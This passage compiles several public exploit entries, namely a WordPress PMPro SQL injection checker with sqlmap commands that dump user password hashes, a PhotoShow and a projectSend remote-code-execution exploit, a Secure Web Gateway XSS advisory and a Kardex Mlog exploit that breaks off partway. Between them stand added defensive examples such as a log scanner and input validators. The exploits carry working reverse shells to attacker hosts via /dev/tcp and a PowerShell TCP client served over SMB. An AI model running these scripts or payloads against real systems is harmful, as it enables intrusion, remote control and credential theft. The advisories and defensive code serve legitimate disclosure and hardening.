    print('{}[!] The target does not seem vulnerable{}'.format(u'\033[91m', u'\033[0m'))
    sys.exit(3)

print('\n{}[*] The target is vulnerable{}'.format(u'\033[92m', u'\033[0m'))
print('\n[+] You can dump the whole WordPress database with:')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url))
print('\n[+] To dump data from specific tables:')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url))
print('\n[+] To dump only WordPress usernames and passwords columns (you should check if the users table has the default name):')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url))
sys.exit(0)
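The script above confirms the injection purely by timing, and that is also how a defender can spot it: the `SLEEP(n)` payload is visible in the request, and if the injection worked the request took at least n seconds. Added example, not part of the exploit or of either vendor's code: a scanner over constructed Apache-style access-log lines (combined format plus a trailing `%D` duration field, an assumption about the logging setup) that URL-decodes the query string, tags time-based, UNION and stacked-query indicators, and marks a time-based attempt as confirmed only when the logged duration matches the requested sleep. The same indicator function is run over the GLPI `_actors` value from the change.form.php PoC earlier on this page, which is only visible in a WAF or request-body log.

```python
import re
import urllib.parse
from dataclasses import dataclass

# Constructed access-log lines (Apache combined format plus a trailing %D field,
# the request duration in microseconds). Not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Jan/2023:10:01:02 +0000] "GET /wordpress/?rest_route=%2Fpmpro%2Fv1%2Forder&code=a%27+OR+%28SELECT+1+FROM+%28SELECT%28SLEEP%282%29%29%29a%29--+- HTTP/1.1" 200 312 "-" "python-requests/2.28.1" 2104533
203.0.113.7 - - [24/Jan/2023:10:01:05 +0000] "GET /wordpress/?rest_route=%2Fpmpro%2Fv1%2Forder&code=ORD-1001 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 18211
198.51.100.9 - - [24/Jan/2023:11:40:19 +0000] "GET /wordpress/?rest_route=%2Fpmpro%2Fv1%2Forder&code=a%27+OR+%28SELECT+1+FROM+%28SELECT%28SLEEP%285%29%29%29a%29--+- HTTP/1.1" 200 312 "-" "python-requests/2.28.1" 15211
"""

# The GLPI '_actors' value from the change.form.php PoC above, as a WAF or
# request-body log would see it after multipart decoding.
GLPI_ACTORS_BODY = (
    '{"requester":[],"observer":[],"assign":[{"itemtype":"User","items_id":"2\',\'2\',); '
    "INSERT INTO `glpi_documenttypes` (`name`, `ext`, `icon`, `mime`, `is_uploadable`) "
    "VALUES('PHP', 'php', 'jpg-dist.png', 'application/x-php', 1); ---'\","
    '"use_notification":"1","alternative_email":""}]}'
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<duration_us>\d+)$'
)
TIME_BASED_RE = re.compile(r"\b(?P<fn>SLEEP|PG_SLEEP|BENCHMARK)\s*\(\s*(?P<n>\d+(?:\.\d+)?)", re.I)
UNION_RE = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)
STACKED_RE = re.compile(r";\s*(?:INSERT|UPDATE|DELETE|DROP|CREATE|ALTER)\b", re.I)
COMMENT_RE = re.compile(r"--(?:\s|$)|/\*")


@dataclass
class Finding:
    ip: str
    path: str
    tags: frozenset
    confirmed: bool  # time-based payload AND observed latency >= requested sleep


def decode_query(raw):
    """Decode as the application would (%XX and '+' to space), twice, so a
    double-encoded payload is still inspected in its final form."""
    return urllib.parse.unquote_plus(urllib.parse.unquote_plus(raw))


def sqli_indicators(text):
    """Return the set of injection indicators present in already-decoded text."""
    tags = set()
    if TIME_BASED_RE.search(text):
        tags.add("time_based")
    if UNION_RE.search(text):
        tags.add("union")
    if STACKED_RE.search(text):
        tags.add("stacked")
    if "'" in text and COMMENT_RE.search(text):
        tags.add("quote_and_comment")
    return frozenset(tags)


def requested_sleep_seconds(text):
    """Seconds the payload asked the database to sleep. BENCHMARK's argument is
    an iteration count, not a duration, so it yields 0 (tagged but unconfirmable)."""
    m = TIME_BASED_RE.search(text)
    if not m or m.group("fn").upper() == "BENCHMARK":
        return 0.0
    return float(m.group("n"))


def scan_access_log(log_text):
    """Return a Finding for every log line carrying an injection indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_query(m.group("path"))
        tags = sqli_indicators(decoded)
        if not tags:
            continue
        want = requested_sleep_seconds(decoded)
        took = int(m.group("duration_us")) / 1_000_000
        # 10% slack for network and database overhead in either direction.
        confirmed = want > 0 and took >= 0.9 * want
        findings.append(Finding(m.group("ip"), m.group("path"), tags, confirmed))
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f.ip, sorted(f.tags), "CONFIRMED" if f.confirmed else "attempt")
    print("GLPI body:", sorted(sqli_indicators(GLPI_ACTORS_BODY)))
```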
-
PhotoShow 3.0 - Remote Code Execution
# Exploit Title: PhotoShow 3.0 - Remote Code Execution
# Date: January 11, 2023
# Exploit Author: LSCP Responsible Disclosure Lab
# Detailed Bug Description: https://lscp.llc/index.php/2021/07/19/how-white-box-hacking-works-remote-code-execution-and-stored-xss-in-photoshow-3-0/
# Vendor Homepage: https://github.com/thibaud-rohmer
# Software Link: https://github.com/thibaud-rohmer/PhotoShow
# Version: 3.0
# Tested on: Ubuntu 20.04 LTS
# creds of a user with admin privileges required

import sys
import requests
import base64
import urllib.parse

if(len(sys.argv)!=6):
    print('Usage: \n\tpython3 ' + sys.argv[0] + ' "login" ' + '"password" "target_ip" "attacker_ip" "attacker_nc_port"')
    quit()

login=sys.argv[1]
password=sys.argv[2]
targetIp = sys.argv[3]
attackerIp = sys.argv[4]
attackerNcPort = sys.argv[5]

def main():
    session = requests.Session()
    #login as admin user
    logInSession(session, targetIp, login, password)
    #change application behaviour for handling .mp4 video
    uploadExploit(session, targetIp, attackerIp, attackerNcPort)
    #send the shell to attacker's nc by uploading .mp4 video
    sendMP4Video(session, targetIp)
    print("Check your netcat")

def logInSession(session, targetIp, login, password):
    session.headers.update({'Content-Type' : "application/x-www-form-urlencoded"})
    data = "login="+login+"&password="+password
    url = "http://"+targetIp+"/?t=Login"
    response= session.post(url, data=data)
    phpsessid=response.headers.get("Set-Cookie").split(";")[0]
    session.headers.update({'Cookie' : phpsessid})

def uploadExploit(session, targetIp, attackerIp, attackerNcPort):
    #the admin settings form: the exiftran_path setting is later used in a shell command
    exiftranPathInjection=createInjection(attackerIp, attackerNcPort)
    url = "http://"+targetIp+"/?t=Adm&a=Set"
    data = "name=PhotoShow&site_address=&loc=default.ini&user_theme=Default&" \
        + "rss=on&max_comments=50&thumbs_size=200&fbappid=&ffmpeg_path=&encode_video=on&"\
        + "ffmpeg_option=-threads+4+-vcodec+libx264+-acodec+libfdk_aac&rotate_image=on&"\
        + exiftranPathInjection
    session.post(url, data=data).content.decode('utf8')

def createInjection(attackerIp, attackerNcPort):
    textToEncode = "bash -i >& /dev/tcp/"+attackerIp+"/"+attackerNcPort+" 0>&1"
    b64Encoded = base64.b64encode(textToEncode.encode("ascii"))
    strb64 = str(b64Encoded)
    strb64 = strb64[2:len(strb64)-1]
    injection = {"exiftran_path":"echo "+ strb64 +" | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh"}
    return urllib.parse.urlencode(injection)

def sendMP4Video(session, targetIp):
    session.headers.update({'Content-Type' : "multipart/form-data; "\
        +"boundary=---------------------------752343701418612422363028651"})
    url = "http://"+targetIp+"/?a=Upl"
    data = """-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="path"\r
\r
\r
-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="inherit"\r
\r
1\r
-----------------------------752343701418612422363028651\r
Content-Disposition: form-data; name="images[]"; filename="a.mp4"\r
Content-Type: video/mp4\r
\r
a\r
-----------------------------752343701418612422363028651--\r
"""
    try:
        #the upload blocks while the injected command runs, so only wait briefly
        session.post(url, data=data, timeout=0.001)
    except requests.exceptions.ReadTimeout:
        pass

if __name__ =="__main__":
    main()
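The Roxy WI `delcert` parameter earlier on this page and the PhotoShow `exiftran_path` setting above both end up inside a string that a shell parses, which is why `a & wget ...` and `echo ... | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh` run as commands. Added example, not code from either project: the unsafe string-building shape (a hypothetical reconstruction shown only for contrast and never executed) beside an argv-based builder with allowlist validation of the certificate name and of the external-tool path. The payload strings are the two PoC values with the base64 reverse-shell body replaced by a label; the certificate directory, tool directories and `exiftran -ai` usage are assumptions.

```python
import re
from pathlib import PurePosixPath

# Constructed inputs: the two PoC values above, with the base64 reverse-shell
# body of the PhotoShow payload replaced by the label <b64>.
ROXY_DELCERT = "a & wget <id>.oastify.com;"
PHOTOSHOW_EXIFTRAN_PATH = "echo <b64> | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh"

# One filename component: letters, digits, dot, dash, underscore; no separators.
CERT_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")
# Characters /bin/sh gives a meaning to. An argv list never reaches a shell, but a
# config value that is later written into a script or .ini must not carry them.
SHELL_META = set(";&|`$(){}<>'\"\\*?!~#\n\r")


def unsafe_delete_cert_command(name):
    """The vulnerable shape (hypothetical reconstruction, NOT Roxy WI's code):
    the request parameter is interpolated into one string handed to a shell, so
    '&' and ';' in the value become command separators. Never executed here."""
    return "rm -f /etc/ssl/certs/%s" % name


def safe_delete_cert_argv(name, cert_dir="/etc/ssl/certs"):
    """Validate the certificate name against an allowlist and return an argv
    list for subprocess.run(argv) with shell=False: the value can only ever be
    a single argument, never a second command."""
    if not CERT_NAME_RE.fullmatch(name) or ".." in name:
        raise ValueError("rejected certificate name: %r" % name)
    return ["rm", "-f", str(PurePosixPath(cert_dir) / name)]


def validate_tool_path(value, allowed_dirs=("/usr/bin", "/usr/local/bin")):
    """Validate an admin-supplied path to an external binary (what PhotoShow's
    'exiftran_path' setting is for): absolute, no '..', no shell metacharacters
    or whitespace, and located directly in one of the allowed directories."""
    if not value or any(ch.isspace() or ch in SHELL_META for ch in value):
        raise ValueError("shell metacharacters or whitespace in tool path: %r" % value)
    p = PurePosixPath(value)
    if not p.is_absolute() or ".." in p.parts or str(p.parent) not in allowed_dirs:
        raise ValueError("tool path outside allowed directories: %r" % value)
    return str(p)


def build_exiftran_argv(tool_path, image_path):
    """argv for rotating one image in place by its EXIF orientation (exiftran -ai,
    assumed usage); the tool path is validated and the image path is passed as
    one argument that no shell ever parses."""
    return [validate_tool_path(tool_path), "-ai", image_path]


def cert_name_ok(name):
    try:
        safe_delete_cert_argv(name)
        return True
    except ValueError:
        return False


def tool_path_ok(value):
    try:
        validate_tool_path(value)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("shell would see:", unsafe_delete_cert_command(ROXY_DELCERT))
    print("delcert accepted:", cert_name_ok(ROXY_DELCERT))
    print("exiftran_path accepted:", tool_path_ok(PHOTOSHOW_EXIFTRAN_PATH))
```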
-
projectSend r1605 - Remote Code Execution (RCE)
Exploit Title: projectSend r1605 - Remote Code Execution (RCE)
Application: projectSend
Version: r1605
Bugs: RCE via file extension manipulation
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 26-01-2023
Author: Mirabbas Ağalarov
Tested on: Linux
POC video: https://youtu.be/Ln7KluDfnk4

2. Technical Details & POC
========================================

1. The attacker first creates a txt file and pastes the following code into it. Next, the attacker changes the file extension to jpg, because the system does not allow php, sh, exe etc. files.

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

2. Then the attacker starts listening on the IP and port:

nc -lvp 4444

3. When uploading the file, the HTTP request looks as below. The file name should be like this: openme.sh;jpg

POST /includes/upload.process.php HTTP/1.1
Host: localhost
Content-Length: 525
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59
Connection: close

------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="name"

openme.sh;jpg
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundary0enbZuQQAtahFVjI
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1
------WebKitFormBoundary0enbZuQQAtahFVjI--

4. In the second request, the filename section at the bottom is changed to: openme.sh

POST /files-edit.php?ids=34 HTTP/1.1
Host: localhost
Content-Length: 1016
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/files-edit.php?ids=34&type=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59
Connection: close

------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="csrf_token"

66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][id]"

34
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][original]"

openme.sh;.jpg
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][file]"

1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][name]"

openme.sh
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][description]"


------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="file[1][expiry_date]"

25-02-2023
------WebKitFormBoundaryc8btjvyb3An7HcmA
Content-Disposition: form-data; name="save"


------WebKitFormBoundaryc8btjvyb3An7HcmA--

It does not matter who downloads the file: if it is opened, the reverse shell is triggered and code execution is achieved.

Private YouTube video PoC: https://youtu.be/Ln7KluDfnk4
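The GLPI Cartography upload (`name=poc.php`), the GLPI `fileupload.php` request (`filename="test.php"`) and the projectSend sequence (`openme.sh;jpg`, then renamed to `openme.sh`) all work because the extension the client supplies decides how the stored file is later treated. Added example, not code from GLPI or projectSend: an upload-name validator that str
ips directory parts, refuses `;` and control characters, allowlists the final extension, refuses executable extensions in inner segments, lets the server pick the on-disk name, and a rename check that keeps the extension fixed after upload. The allowed-extension set and the display-name sanitisation are assumptions about the application.

```python
import re
import secrets
import unicodedata

# Extensions the application actually needs to accept: the allowlist is the control.
ALLOWED_EXTS = frozenset({"jpg", "jpeg", "png", "gif", "pdf", "txt", "mp4"})
# Backstop: names like 'shell.php.jpg' are refused because some server setups
# dispatch on any dotted segment, not just the last one.
EXECUTABLE_EXTS = frozenset({"php", "php3", "php4", "php5", "phtml", "phar",
                             "sh", "bash", "exe", "bat", "cmd", "ps1", "pl", "py", "cgi"})
SAFE_CHARS_RE = re.compile(r"[^A-Za-z0-9._-]")

# Constructed inputs: the client-supplied names from the PoCs above.
POC_NAMES = ("poc.php", "test.php", "openme.sh;jpg", "openme.sh;.jpg")


class UploadRejected(ValueError):
    pass


def split_name(client_filename):
    """Return (stem, ext, inner_segments) after stripping any directory part.
    Rejects empty names, control characters and ';' / ':' (which let a later
    component, or a shell, see a different extension than the one validated)."""
    base = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    base = unicodedata.normalize("NFKC", base)
    if not base or any(ord(c) < 0x20 or c == "\x7f" for c in base):
        raise UploadRejected("empty name or control characters")
    if ";" in base or ":" in base:
        raise UploadRejected("forbidden character in %r" % base)
    parts = base.split(".")
    if len(parts) < 2 or not parts[0] or not parts[-1]:
        raise UploadRejected("missing stem or extension in %r" % base)
    return ".".join(parts[:-1]), parts[-1].lower(), [p.lower() for p in parts[1:-1]]


def validate_upload(client_filename, allowed_exts=ALLOWED_EXTS):
    """Return (stored_name, display_name). The on-disk name is chosen by the
    server (random token + validated extension); the client name only ever
    becomes display metadata, after sanitisation."""
    stem, ext, inner = split_name(client_filename)
    if ext not in allowed_exts:
        raise UploadRejected("extension .%s not allowed" % ext)
    if any(seg in EXECUTABLE_EXTS for seg in inner):
        raise UploadRejected("executable extension inside %r" % client_filename)
    display = SAFE_CHARS_RE.sub("_", stem)[:100] + "." + ext
    stored = secrets.token_hex(16) + "." + ext
    return stored, display


def validate_rename(stored_name, requested_name):
    """A post-upload rename (projectSend's second request) may change the stem
    but never the extension that was validated at upload time."""
    stem, ext, inner = split_name(requested_name)
    if ext != stored_name.rsplit(".", 1)[-1].lower():
        raise UploadRejected("rename may not change the extension")
    if any(seg in EXECUTABLE_EXTS for seg in inner):
        raise UploadRejected("executable extension inside %r" % requested_name)
    return SAFE_CHARS_RE.sub("_", stem)[:100] + "." + ext


def upload_ok(name):
    try:
        validate_upload(name)
        return True
    except UploadRejected:
        return False


def rename_ok(stored_name, requested_name):
    try:
        validate_rename(stored_name, requested_name)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    for n in POC_NAMES:
        print("%-16s accepted=%s" % (n, upload_ok(n)))
    print(validate_upload("holiday.photo.jpg"))
```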
-
Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)
Exploit Title: Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)
Product: Secure Web Gateway
Affected Versions: 10.2.11, potentially other versions
Fixed Versions: 10.2.17, 11.2.6, 12.0.1
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://www.skyhighsecurity.com/en-us/products/secure-web-gateway.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-002
Advisory Status: published
CVE: CVE-2023-0214
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0214


Introduction
============

"Skyhigh Security Secure Web Gateway (SWG) is the intelligent, cloud-native web security solution that connects and secures your workforce from malicious websites and cloud apps—from anywhere, any application, and any device."

(from the vendor's homepage)


More Details
============

The Secure Web Gateway's (SWG) block page, which is displayed when a request or response is blocked by a rule, can contain static files such as images, stylesheets or JavaScript code. These files are embedded using special URL paths. Consider the following excerpt of a block page:

------------------------------------------------------------------------
<html>
<!-- FileName: index.html Language: [en] -->
<!--Head-->
<head>
  <meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
  <meta http-equiv="X-UA-Compatible" content="IE=7" />
  <title>McAfee Web Gateway - Notification</title>
  <script src="/mwg-internal/de5fs23hu73ds/files/javascript/sw.js" type="text/javascript" ></script>
  <link rel="stylesheet" href="/mwg-internal/de5fs23hu73ds/files/default/stylesheet.css" />
</head>
------------------------------------------------------------------------

Static content is loaded from URL paths prefixed with "/mwg-internal/de5fs23hu73ds/". It was discovered that paths with this prefix are intercepted and directly handled by the SWG no matter on which domain they are accessed.

While the prefix can be configured in the SWG, attackers can also obtain it using another currently undisclosed vulnerability.

By reverse engineering the file "libSsos.so" and analysing JavaScript code, it was possible to derive the API of the "Ssos" plugin's "SetLoginToken" action. Through the following call using the command-line HTTP client curl, the behaviour of the plugin was further analysed:

------------------------------------------------------------------------
$ curl --proxy http://192.168.1.1:8080 -i 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p'
HTTP/1.0 200 OK
P3P: p
Connection: Keep-Alive
Set-Cookie: MwgSso=v; Path=/; Max-Age=240;
Content-Type: application/javascript
Content-Length: 2
X-Frame-Options: deny

c;
------------------------------------------------------------------------

The response embeds the values of the three URL parameters "v", "c" and "p". The value for "p" is embedded as value of the "P3P" header, the value of "c" as the response body and the value of "v" as the value of the cookie "MwgSso". It is also possible to include newline or carriage return characters in the parameter value which are not encoded in the output.

Consequently, if the value of the parameter "p" contains a line break, arbitrary headers can be injected. If two line breaks follow, an arbitrary body can be injected. If a suitable "Content-Length" header is injected, the remaining headers and body of the original response will be ignored by the browser. This means that apart from the initial "P3P" header, an arbitrary response can be generated. For example, a page containing JavaScript code could be returned, resulting in a cross-site scripting attack.

Consequently, attackers can construct URL paths that can be appended to any domain and cause an arbitrary response to be returned if the URL is accessed through the SWG. This could be exploited by distributing such URLs or even by offering a website which performs an automatic redirect to any other website using such a URL. As a result, the SWG exposes its users to self-induced cross-site scripting vulnerabilities in any website.


Proof of Concept
================

In the following request, the "p" parameter is used to inject suitable "Content-Type" and "Content-Length" headers, as well as an arbitrary HTML response body.

------------------------------------------------------------------------
$ curl --proxy http://192.168.1.1:8080 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p%0aContent-Type: text/html%0aContent-Length: 27%0a%0a<h1>RedTeam Pentesting</h1>'
HTTP/1.0 200 OK
P3P: p
Content-Type: text/html
Content-Length: 27

<h1>RedTeam Pentesting</h1>
------------------------------------------------------------------------

As mentioned above, the HTTP response body could also include JavaScript code designed to interact with the domain specified in the URL resulting in a cross-site scripting vulnerability.


Workaround
==========

None.


Fix
===

According to the vendor, the vulnerability is mitigated in versions 10.2.17, 11.2.6 and 12.0.1 of the Secure Web Gateway. This was not verified by RedTeam Pentesting GmbH. The vendor's security bulletin can be found at the following URL:

https://kcm.trellix.com/corporate/index?page=content&id=SB10393


Security Risk
=============

The vulnerability could be used to perform cross-site scripting attacks against users of the SWG in context of any domain. Attackers only need to convince users to open a prepared URL or visit an attacker's website that could perform an automatic redirect to an exploit URL. This exposes any website visited through the SWG to the various risks and consequences of a cross-site scripting vulnerability such as account takeover. As a result, this vulnerability poses a high risk.


Timeline
========

2022-07-29 Vulnerability identified
2022-10-20 Customer approved disclosure to vendor
2022-10-20 Vulnerability was disclosed to the vendor
2023-01-17 Patch released by vendor for versions 10.2.17, 11.2.6 and 12.0.1.
2023-01-26 Detailed advisory released by RedTeam Pentesting GmbH


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

--
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Alter Posthof 1                           Fax : +49 241 510081-99
52062 Aachen                              https://www.redteam-pentesting.de
Germany                                   Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
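The advisory's proof of concept works because the `p` parameter is copied into the `P3P` header byte for byte, so a line feed in it ends that header and everything after it is parsed as further headers and then as the body. Added example, not SWG code: a reconstruction of that unencoded reflection based only on the curl output quoted in the advisory (the response template is therefore an assumption), a browser-style response parser that shows how the injected `Content-Type` and `Content-Length` take over and the genuine headers are discarded, and the header-value check (printable ASCII and TAB only) that a fix needs.

```python
import re
import urllib.parse

# Constructed from the proof-of-concept request above: the 'p' parameter after
# URL decoding (each %0a becomes a bare line feed).
POC_P = urllib.parse.unquote(
    "p%0aContent-Type: text/html%0aContent-Length: 27%0a%0a<h1>RedTeam Pentesting</h1>"
)

# RFC 7230 field-value as a server should enforce it: visible ASCII, space and
# horizontal tab. CR and LF are exactly what turns a value into new headers.
FIELD_VALUE_RE = re.compile(r"^[\x20-\x7e\t]*$")


class HeaderInjection(ValueError):
    pass


def safe_header_value(value):
    """Return value unchanged if it may be used as a header value; raise otherwise."""
    if not FIELD_VALUE_RE.fullmatch(value):
        raise HeaderInjection("control characters in header value: %r" % value)
    return value


def header_value_ok(value):
    try:
        safe_header_value(value)
        return True
    except HeaderInjection:
        return False


def reflected_response(v, c, p):
    """Reconstruction (assumed from the advisory's curl output, not SWG code) of
    the SetLoginToken response: 'p' becomes the P3P header, 'v' the cookie value
    and 'c' the JavaScript body, none of them encoded."""
    body = c + ";"
    return (
        "HTTP/1.0 200 OK\r\n"
        "P3P: " + p + "\r\n"
        "Connection: Keep-Alive\r\n"
        "Set-Cookie: MwgSso=" + v + "; Path=/; Max-Age=240;\r\n"
        "Content-Type: application/javascript\r\n"
        "Content-Length: " + str(len(body)) + "\r\n"
        "X-Frame-Options: deny\r\n"
        "\r\n" + body
    )


def fixed_response(v, c, p):
    """Same template, with the two header-bound parameters validated first."""
    return reflected_response(safe_header_value(v), c, safe_header_value(p))


def parse_response(raw):
    """Parse the way a lenient browser does: a bare LF ends a header line, the
    first empty line ends the header block, the first occurrence of a header
    wins, and Content-Length bounds the body, so whatever trails the injected
    body (here the genuine Set-Cookie, Content-Type, ...) is simply ignored."""
    m = re.search(r"\r?\n\r?\n", raw)
    if m is None:
        raise ValueError("no end of headers")
    head, body = raw[: m.start()], raw[m.end():]
    lines = re.split(r"\r?\n", head)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    if "content-length" in headers:
        body = body[: int(headers["content-length"])]
    return {"status": lines[0], "headers": headers, "body": body}


if __name__ == "__main__":
    split = parse_response(reflected_response("v", "c", POC_P))
    print(split["headers"]["content-type"], repr(split["body"]))
    print("p accepted by fix:", header_value_ok(POC_P))
```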
-
Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)
#!/usr/bin/env python3
# Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)
# Date: 12/13/2022
# Exploit Author: Patrick Hener
# Vendor Homepage: https://www.kardex.com/en/mlog-control-center
# Version: 5.7.12+0-a203c2a213-master
# Tested on: Windows Server 2016
# CVE : CVE-2023-22855
# Writeup: https://hesec.de/posts/CVE-2023-22855
#
# You will need to run a netcat listener beforehand: ncat -lnvp <port>
#

import requests, argparse, base64, os, threading
from impacket import smbserver


def probe(target):
    headers = { "Accept-Encoding": "deflate" }
    res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers)
    if "fonts" in res.text:
        return True
    else:
        return False


def gen_payload(lhost, lport):
    rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()'
    rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE'))
    payload = f"""<#@ template language="C#" #>
<#@ Import Namespace="System" #>
<#@ Import Namespace="System.Diagnostics" #>
<#
var proc1 = new ProcessStartInfo();
string anyCommand;
anyCommand = "powershell -e {rev_shell_blob_b64.decode()}";
proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\Windows\System32";
proc1.FileName = @"C:\Windows\System32\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c "+anyCommand;
Process.Start(proc1);
#>"""
    return payload


def start_smb_server(lhost):
    server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
    server.addShare("SHARE", os.getcwd(), '')
    server.setSMB2Support(True)
    server.setSMBChallenge('')
    server.start()


def trigger_vulnerability(target, lhost):
    headers = { "Accept-Encoding": "deflate" }
    requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers)


def main():
    # Well, args
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', help='Target host url', required=True)
    parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True)
    parser.add_argument('-p', '--lport', help='Attacker listening port', required=True)
    args = parser.parse_args()

    # Probe if target is vulnerable
    print("[*] Probing target")
    if probe(args.target):
        print("[+] Target is alive and File Inclusion working")
    else:
        print("[-] Target is not alive or File Inclusion not working")
        exit(-1)

    # Write payload to file
    print("[*] Writing 'exploit.t4' payload to be included later on")
    with open("exploit.t4", 'w') as template:
        template.write(gen_payload(args.lhost, args.lport))
        template.close()

    # Start smb server in background
    print("[*] Starting SMB Server in the background")
